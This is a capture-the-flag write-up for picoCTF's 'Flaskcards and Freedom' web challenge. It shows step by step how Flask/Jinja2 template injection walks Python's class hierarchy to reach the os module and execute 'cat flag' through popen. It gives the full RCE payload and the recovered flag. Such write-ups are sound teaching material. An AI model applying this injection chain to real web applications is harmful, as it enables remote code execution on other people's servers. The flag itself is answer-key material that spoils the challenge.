Flaskcards and Freedom - Web

From the hints on this challenge, we need to get RCE and we can get that by template injection.

First we run

g.__class__

This returns a class object: >

Then we do:

g.__class__.__mro__

This returns a list of classes that g.__class__ is inheriting from(mro stands for Method Resolution Order) > (, )

Then we need the second index there which will be [1]. After that we do:

g.__class__.__mro__[1].__subclasses__()

which will return a list of classes that inherit from <class 'object'> >[, , , …]

Then we choose for example index 14 which is a dummy class (just a normal class we can use, we could have used most other classes). By running this command:

g.__class__.__mro__[1].__subclasses__()[14]

We get >

Then we run:

g.__class__.__mro__[1].__subclasses__()[14].__init__

which will return a function that creates a new tarfile object >

After that, we run this command:

g.__class__.__mro__[1].__subclasses__()[14].__init__.__globals__

which will return a list of all globals functions available in the user’s scope > {‘TarFile’: , ‘open’: >, …

Then we need to choose the sys module from the result above because the sys module contains the os module which we can use to open a file in Python. Once we have chosen the os module, we can use the popen and read function to read the flag file. The final command looks like this:

{{ g.__class__.__mro__[1].__subclasses__()[14].__init__.__globals__['sys'].modules['os'].popen("cat flag").read() }}

This gives us the flag: picoCTF{R_C_E_wont_let_me_be_04eedee8}